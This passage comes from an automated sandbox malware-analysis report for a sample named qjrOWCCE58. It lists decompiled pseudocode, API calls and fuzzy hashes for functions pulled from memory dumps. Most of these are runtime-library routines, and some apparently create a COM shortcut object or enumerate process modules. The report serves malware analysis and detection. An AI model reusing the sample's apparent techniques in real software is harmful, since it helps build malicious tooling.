					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00422905(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00418548(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00422346
0x0042234b
0x00422369
0x0042236b
0x0042236e
0x0042239b
0x004223a3
0x004223a5
0x004223be
0x004223c1
0x004223c4
0x004223d2
0x004223e1
0x004223e9
0x004223eb
0x00422404
0x00422407
0x00422407
0x004223ed
0x004223f4
0x004223ff
0x004223ff
0x00422409
0x00000000
0x00422409
0x004223c9
0x004223ce
0x004223d0
0x00000000
0x00000000
0x00000000
0x004223d0
0x004223ae
0x00000000
0x004223b9
0x00422370
0x00422373
0x00422376
0x00422389
0x0042238c
0x0042235f
0x0042235f
0x00000000
0x00422362
0x0042237c
0x00422381
0x00422383
0x0042240d
0x0042240d
0x00000000
0x00422383
0x0042234d
0x00422352
0x00422357
0x00422359
0x0042235c
0x00000000

APIs

Part of subcall function 00418548: _free.LIBCMT ref: 00418556

Part of subcall function 0041E864: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0041FB7E,?,00000000,00000000), ref: 0041E910

GetLastError.KERNEL32 ref: 004223A7
__dosmaperr.LIBCMT ref: 004223AE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 004223ED
__dosmaperr.LIBCMT ref: 004223F4

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 24f100549f9ba81804ac684be1db68174a31dc0a95785eca6f3ac4c7ab517dd6
Instruction ID: bc702ce6b80f212d977a0096b4bf1d0c2a20cddeedcdc4286203499f95d61e8d
Opcode Fuzzy Hash: 24f100549f9ba81804ac684be1db68174a31dc0a95785eca6f3ac4c7ab517dd6
Instruction Fuzzy Hash: 7A212471700225BFDB20AF76AD809ABB7ACFF04368740851BF91983251D77CED828798

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0 Relevance: 6.1, APIs: 4, Instructions: 86
comCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00404EB0(char* __ecx, short* __edx, char* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v528;
				void* _v532;
				void* _v536;
				intOrPtr _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				char* _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t37;
				intOrPtr* _t41;
				intOrPtr* _t43;
				char* _t57;
				signed int _t59;

				_t56 = __edx;
				_t24 =  *0x43b054; // 0x41d6575c
				_v8 = _t24 ^ _t59;
				_t57 = _a4;
				_t45 = __edx;
				_t58 = __ecx;
				_v540 = _a8;
				__imp__CoInitialize(0);
				_t27 =  &_v532;
				__imp__CoCreateInstance(0x42c2c0, 0, 1, 0x42c290, _t27);
				if(_t27 >= 0) {
					_t29 = _v532;
					 *((intOrPtr*)( *_t29 + 0x50))(_t29, __edx);
					_t31 = _v532;
					 *((intOrPtr*)( *_t31 + 0x1c))(_t31, _v540);
					_t33 = _v532;
					 *((intOrPtr*)( *_t33 + 0x44))(_t33, __ecx, 0);
					_t35 = _v532;
					_t56 =  &_v536;
					_t58 =  *((intOrPtr*)( *_t35))(_t35, 0x42c2b0,  &_v536);
					if(_t58 >= 0) {
						MultiByteToWideChar(0, 0, _t57, 0xffffffff,  &_v528, 0x104);
						_t41 = _v536;
						_t56 =  &_v528;
						_t58 =  *((intOrPtr*)( *_t41 + 0x18))(_t41,  &_v528, 1);
						_t43 = _v536;
						 *((intOrPtr*)( *_t43 + 8))(_t43);
					}
					_t37 = _v532;
					 *((intOrPtr*)( *_t37 + 8))(_t37);
					__imp__CoUninitialize();
					_t27 = _t58;
				}
				return E0040D3AF(_t27, _t45, _v8 ^ _t59, _t56, _t57, _t58);
			}

0x00404eb0
0x00404eb9
0x00404ec0
0x00404ec9
0x00404ecc
0x00404ed0
0x00404ed2
0x00404ed8
0x00404ede
0x00404ef3
0x00404efb
0x00404f01
0x00404f0b
0x00404f0e
0x00404f1d
0x00404f20
0x00404f2c
0x00404f2f
0x00404f35
0x00404f46
0x00404f4a
0x00404f5f
0x00404f65
0x00404f6b
0x00404f7a
0x00404f7c
0x00404f85
0x00404f85
0x00404f88
0x00404f91
0x00404f94
0x00404f9a
0x00404f9a
0x00404fac

APIs

CoInitialize.OLE32(00000000), ref: 00404ED8
CoCreateInstance.OLE32(0042C2C0,00000000,00000001,0042C290,?), ref: 00404EF3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,00000000), ref: 00404F5F
CoUninitialize.OLE32(?,00000000), ref: 00404F94

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
String ID:
API String ID: 2968213145-0
Opcode ID: c503937011c6bdaf6fd2d4e360892182a2be9a8a1f700d466b7ae01ea72e08e4
Instruction ID: 0d71a99e4b296ba918b4683e17353b7536b1bfadfd186f78dc70421710900630
Opcode Fuzzy Hash: c503937011c6bdaf6fd2d4e360892182a2be9a8a1f700d466b7ae01ea72e08e4
Instruction Fuzzy Hash: 96314F71B40218AFD720DB94CC88FA977B8EF59714F1001E9F619EB290CA71AD45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 008425A6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 008387AF: _free.LIBCMT ref: 008387BD

Part of subcall function 0083EACB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0083FB7A,0000FDE9,00000000,?,?,?,0083F8F3,0000FDE9,00000000,?), ref: 0083EB77

GetLastError.KERNEL32 ref: 0084260E
__dosmaperr.LIBCMT ref: 00842615
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00842654
__dosmaperr.LIBCMT ref: 0084265B

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 9d30d75eef5f17909aba930fd122081c0b90f5c75d8b400fbebdb45a3c688528
Instruction ID: 94750fce9fcdd47caafb643badbcec9932dea6ed4c5a6c0907f3b1efeaf04632
Opcode Fuzzy Hash: 9d30d75eef5f17909aba930fd122081c0b90f5c75d8b400fbebdb45a3c688528
Instruction Fuzzy Hash: 5E21297160861DEFDB20AF699C80D6BB7ACFFA0364B518619F828D7150D731EC509BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0083CEFF Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8e9d97af6733ed43e1a6ee6462d21185f5b33367ae305ea3e02a7c1e0e01fc
Instruction ID: e76299a81e6b14a79f934fedfc1cdeb60ac28a0415c0554769ef8a549891cbc5
Opcode Fuzzy Hash: 2a8e9d97af6733ed43e1a6ee6462d21185f5b33367ae305ea3e02a7c1e0e01fc
Instruction Fuzzy Hash: B321A575B06224ABDB318A75DC81A6A7769FF857A0F250621F805F7290EFB0ED018BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0041B333 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0041B333(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x43b1c8; // 0x8
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0041CFAF(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E0041CA2B(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0041CFAF(__eflags,  *0x43b1c8, _t51);
							if(__eflags != 0) {
								E0041B161(_t51, 0x43c8d8);
								E0041CA88(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0041CFAF(__eflags,  *0x43b1c8, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0041CFAF(0,  *0x43b1c8, 0);
							_push(0);
							L9:
							E0041CA88();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E0041CF70(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x43b1c8; // 0x8
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00418419(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x43b1c8; // 0x8
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0041CFAF(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E0041CA2B(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0041CFAF(__eflags,  *0x43b1c8, _t60);
								if(__eflags != 0) {
									E0041B161(_t60, 0x43c8d8);
									E0041CA88(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0041CFAF(__eflags,  *0x43b1c8, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0041CFAF(__eflags,  *0x43b1c8, _t20);
								_push(_t60);
								L25:
								E0041CA88();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E0041CF70(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x43b1c8; // 0x8
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00418419(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x43b1c8; // 0x8
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0041CFAF(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E0041CA2B(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0041CFAF(__eflags,  *0x43b1c8, _t54);
											if(__eflags != 0) {
												E0041B161(_t54, 0x43c8d8);
												E0041CA88(0);
												goto L45;
											} else {
												_t40 = 0;
												E0041CFAF(__eflags,  *0x43b1c8, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0041CFAF(0,  *0x43b1c8, 0);
											_push(0);
											L41:
											E0041CA88();
											goto L36;
										}
									}
								} else {
									_t54 = E0041CF70(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x43b1c8; // 0x8
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x0041b333
0x0041b333
0x0041b33e
0x0041b340
0x0041b345
0x0041b348
0x0041b366
0x0041b369
0x0041b36e
0x0041b370
0x00000000
0x0041b372
0x0041b37e
0x0041b381
0x0041b382
0x0041b384
0x0041b3a9
0x0041b3ab
0x0041b3c4
0x0041b3cb
0x0041b3d0
0x00000000
0x0041b3ad
0x0041b3ad
0x0041b3b6
0x0041b3bb
0x00000000
0x0041b3bb
0x0041b386
0x0041b386
0x0041b386
0x0041b38f
0x0041b394
0x0041b395
0x0041b395
0x0041b39a
0x00000000
0x0041b39a
0x0041b384
0x0041b34a
0x0041b350
0x0041b354
0x0041b361
0x00000000
0x0041b356
0x0041b359
0x0041b3d3
0x0041b3d3
0x0041b35b
0x0041b35b
0x0041b35b
0x0041b35d
0x0041b35d
0x0041b35d
0x0041b359
0x0041b354
0x0041b3d6
0x0041b3de
0x0041b3e0
0x0041b3e2
0x0041b3ea
0x0041b3ef
0x0041b3f0
0x0041b3f5
0x0041b3f6
0x0041b3f9
0x0041b413
0x0041b416
0x0041b41b
0x0041b41d
0x00000000
0x0041b41f
0x0041b42b
0x0041b42e
0x0041b42f
0x0041b431
0x0041b454
0x0041b456
0x0041b46d
0x0041b474
0x0041b479
0x00000000
0x0041b458
0x0041b45f
0x0041b464
0x00000000
0x0041b464
0x0041b433
0x0041b43a
0x0041b43f
0x0041b440
0x0041b440
0x0041b445
0x00000000
0x0041b445
0x0041b431
0x0041b3fb
0x0041b401
0x0041b403
0x0041b405
0x0041b40e
0x00000000
0x0041b407
0x0041b407
0x0041b40a
0x0041b484
0x0041b484
0x0041b489
0x0041b48c
0x0041b48d
0x0041b48e
0x0041b495
0x0041b497
0x0041b49c
0x0041b49f
0x0041b4bd
0x0041b4c0
0x0041b4c5
0x0041b4c7
0x00000000
0x0041b4c9
0x0041b4d5
0x0041b4d9
0x0041b4db
0x0041b500
0x0041b502
0x0041b51b
0x0041b522
0x00000000
0x0041b504
0x0041b504
0x0041b50d
0x0041b512
0x00000000
0x0041b512
0x0041b4dd
0x0041b4dd
0x0041b4dd
0x0041b4e6
0x0041b4eb
0x0041b4ec
0x0041b4ec
0x00000000
0x0041b4f1
0x0041b4db
0x0041b4a1
0x0041b4a7
0x0041b4a9
0x0041b4ab
0x0041b4b8
0x00000000
0x0041b4ad
0x0041b4ad
0x0041b4b0
0x0041b52a
0x0041b52a
0x0041b4b2
0x0041b4b2
0x0041b4b2
0x0041b4b2
0x0041b4b4
0x0041b4b4
0x0041b4b4
0x0041b4b0
0x0041b4ab
0x0041b52d
0x0041b535
0x0041b537
0x0041b537
0x0041b53e
0x0041b40c
0x0041b47c
0x0041b47c
0x0041b47e
0x00000000
0x0041b480
0x0041b483
0x0041b483
0x0041b47e
0x0041b40a
0x0041b405
0x0041b3e4
0x0041b3e9
0x0041b3e9

APIs

GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
_free.LIBCMT ref: 0041B395
_free.LIBCMT ref: 0041B3CB
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 35266d86009a1bce2993076ca7c1ae5dbaa002826784fc0696b61f98f33b40fa
Instruction ID: cf54ba7a9def2aa0b3a31ff6f3464b4171b996f7a664fa4670a3299a755a710b
Opcode Fuzzy Hash: 35266d86009a1bce2993076ca7c1ae5dbaa002826784fc0696b61f98f33b40fa
Instruction Fuzzy Hash: 9211AB322446086B8B1126765CD5AEB2259CF813F9725013BF634862E1DF698CD242AC

Uniqueness

Uniqueness Score: -1.00%

Function 0083B59A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
_free.LIBCMT ref: 0083B5FC
_free.LIBCMT ref: 0083B632
SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 35266d86009a1bce2993076ca7c1ae5dbaa002826784fc0696b61f98f33b40fa
Instruction ID: e419c7c0496de12769d8e3eec42c51b0151cca83889977aab4659fad1b930347
Opcode Fuzzy Hash: 35266d86009a1bce2993076ca7c1ae5dbaa002826784fc0696b61f98f33b40fa
Instruction Fuzzy Hash: E911E9B23403016ADB1126B9ACC6E3F215AFFD13B5F241634F318D61E2EF618C0142E5

Uniqueness

Uniqueness Score: -1.00%

Function 00824D97 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00824DF7
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 00824E14
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 00824E31
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00824E38

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen
String ID:
API String ID: 4241681289-0
Opcode ID: 017d9b97119a08e1fcc65e7a079f3965cbf904742a141816d86715bcc600ed0c
Instruction ID: c476e1eae1689bc6c56afe0fc308455595b7bb3c6f6a52b03051d9a9c7e717c4
Opcode Fuzzy Hash: 017d9b97119a08e1fcc65e7a079f3965cbf904742a141816d86715bcc600ed0c
Instruction Fuzzy Hash: AE21D675A006299BD725DF64DC41BEDBBB8FF05300F0042A5E644D7240DBB15BC5CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041B48A Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0041B48A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x43b1c8; // 0x8
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0041CFAF(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E0041CA2B(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0041CFAF(__eflags,  *0x43b1c8, _t18);
							if(__eflags != 0) {
								E0041B161(_t18, 0x43c8d8);
								E0041CA88(0);
								goto L13;
							} else {
								_t13 = 0;
								E0041CFAF(__eflags,  *0x43b1c8, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0041CFAF(0,  *0x43b1c8, 0);
							_push(0);
							L9:
							E0041CA88();
							goto L4;
						}
					}
				} else {
					_t18 = E0041CF70(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x43b1c8; // 0x8
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0041b495
0x0041b497
0x0041b49c
0x0041b49f
0x0041b4bd
0x0041b4c0
0x0041b4c5
0x0041b4c7
0x00000000
0x0041b4c9
0x0041b4d5
0x0041b4d9
0x0041b4db
0x0041b500
0x0041b502
0x0041b51b
0x0041b522
0x00000000
0x0041b504
0x0041b504
0x0041b50d
0x0041b512
0x00000000
0x0041b512
0x0041b4dd
0x0041b4dd
0x0041b4dd
0x0041b4e6
0x0041b4eb
0x0041b4ec
0x0041b4ec
0x00000000
0x0041b4f1
0x0041b4db
0x0041b4a1
0x0041b4a7
0x0041b4ab
0x0041b4b8
0x00000000
0x0041b4ad
0x0041b4b0
0x0041b52a
0x0041b52a
0x0041b4b2
0x0041b4b2
0x0041b4b2
0x0041b4b4
0x0041b4b4
0x0041b4b4
0x0041b4b0
0x0041b4ab
0x0041b52d
0x0041b535
0x0041b53e

APIs

GetLastError.KERNEL32(?,?,?,00411DE6,004010D2), ref: 0041B48F
_free.LIBCMT ref: 0041B4EC
_free.LIBCMT ref: 0041B522
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,00411DE6,004010D2), ref: 0041B52D

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 78086da9b98803295b0212d5c995fbc783c3d42477c0c2cf4c67d79b7a3f8be8
Instruction ID: 8e6e0385bd3449d06f5f1b931724d6ec82d9d9dfde68256e7a22183d691bbb7e
Opcode Fuzzy Hash: 78086da9b98803295b0212d5c995fbc783c3d42477c0c2cf4c67d79b7a3f8be8
Instruction Fuzzy Hash: E811CA323446006A9B1127766CC1AAB265ACFC03BD724423AF614872D2DF6D8CC242AC

Uniqueness

Uniqueness Score: -1.00%

Function 0083B6F1 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0083204D,00821339), ref: 0083B6F6
_free.LIBCMT ref: 0083B753
_free.LIBCMT ref: 0083B789
SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,?,?,0083204D,00821339), ref: 0083B794

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 78086da9b98803295b0212d5c995fbc783c3d42477c0c2cf4c67d79b7a3f8be8
Instruction ID: b87818f52f4f9c24c2459b4ee35dae2ff8aee4067fcb54b76b3364efa6791a67
Opcode Fuzzy Hash: 78086da9b98803295b0212d5c995fbc783c3d42477c0c2cf4c67d79b7a3f8be8
Instruction Fuzzy Hash: 4711A5723402006BDB1126BCACC6E3B225AFFC57B5F251634F318D61E1DF618C0242E5

Uniqueness

Uniqueness Score: -1.00%

Function 008319CE Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00831A8F,?,?,0043C598,00000000,?,00831BBA,00000004,0042DC44,0042DC3C,0042DC44,00000000), ref: 00831A5E

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 12e0d5c35fc5f475c0f8e37e798e99a5f65e160c19565ba2099c2d81897eaa7b
Instruction ID: c86babf736744f7520c90214dbe87a1b9a5a5197b036f233f2a91a6b78bb4181
Opcode Fuzzy Hash: 12e0d5c35fc5f475c0f8e37e798e99a5f65e160c19565ba2099c2d81897eaa7b
Instruction Fuzzy Hash: 8D11C632A46234ABDF328B699C89B5D37A4FF81BB1F650221E905F7280D770FD0186D5

Uniqueness

Uniqueness Score: -1.00%

Function 00429FC2 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00429FC2(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x43ba90, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00429FAB();
					E00429F6D();
					_t13 = WriteConsoleW( *0x43ba90, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00429fdf
0x00429fe3
0x00429ff0
0x00429ff5
0x0042a010
0x0042a010
0x0042a016

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,00428CC6,00000000,00000001,00000000,00000000,?,0041F362,?,00000000,00000000), ref: 00429FD9
GetLastError.KERNEL32(?,00428CC6,00000000,00000001,00000000,00000000,?,0041F362,?,00000000,00000000,?,00000000,?,0041F8AE,?), ref: 00429FE5

Part of subcall function 00429FAB: CloseHandle.KERNEL32(FFFFFFFE,00429FF5,?,00428CC6,00000000,00000001,00000000,00000000,?,0041F362,?,00000000,00000000,?,00000000), ref: 00429FBB

___initconout.LIBCMT ref: 00429FF5

Part of subcall function 00429F6D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00429F9C,00428CB3,00000000,?,0041F362,?,00000000,00000000,?), ref: 00429F80

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,00428CC6,00000000,00000001,00000000,00000000,?,0041F362,?,00000000,00000000,?), ref: 0042A00A

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c0e2ffdbe48cbf17c2ddcace9884fe39dd47e5000dbb5440055343d2fcd434ac
Instruction ID: 895b0b6d193e2a0a22b520ae7a777ce42d96e5c2fb7119bf4981be8c6c7659f7
Opcode Fuzzy Hash: c0e2ffdbe48cbf17c2ddcace9884fe39dd47e5000dbb5440055343d2fcd434ac
Instruction Fuzzy Hash: 97F01C36200129BBCF622FD1EC09A9E7F26EF087A1F454035FA1986521C6328C60BFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0084A229 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,00848F2D,00000000,00000001,00000000,00000000,?,0083F5C9,?,00000000,00000000), ref: 0084A240
GetLastError.KERNEL32(?,00848F2D,00000000,00000001,00000000,00000000,?,0083F5C9,?,00000000,00000000,?,00000000,?,0083FB15,?), ref: 0084A24C

Part of subcall function 0084A212: CloseHandle.KERNEL32(0043BA90,0084A25C,?,00848F2D,00000000,00000001,00000000,00000000,?,0083F5C9,?,00000000,00000000,?,00000000), ref: 0084A222

___initconout.LIBCMT ref: 0084A25C

Part of subcall function 0084A1D4: CreateFileW.KERNEL32(00436CE8,40000000,00000003,00000000,00000003,00000000,00000000,0084A203,00848F1A,00000000,?,0083F5C9,?,00000000,00000000,?), ref: 0084A1E7

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,00848F2D,00000000,00000001,00000000,00000000,?,0083F5C9,?,00000000,00000000,?), ref: 0084A271

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c0e2ffdbe48cbf17c2ddcace9884fe39dd47e5000dbb5440055343d2fcd434ac
Instruction ID: b3c418359e2db2efb5bb48881d6cc48ed7a5b3e999396b3b740cf595058f2ad8
Opcode Fuzzy Hash: c0e2ffdbe48cbf17c2ddcace9884fe39dd47e5000dbb5440055343d2fcd434ac
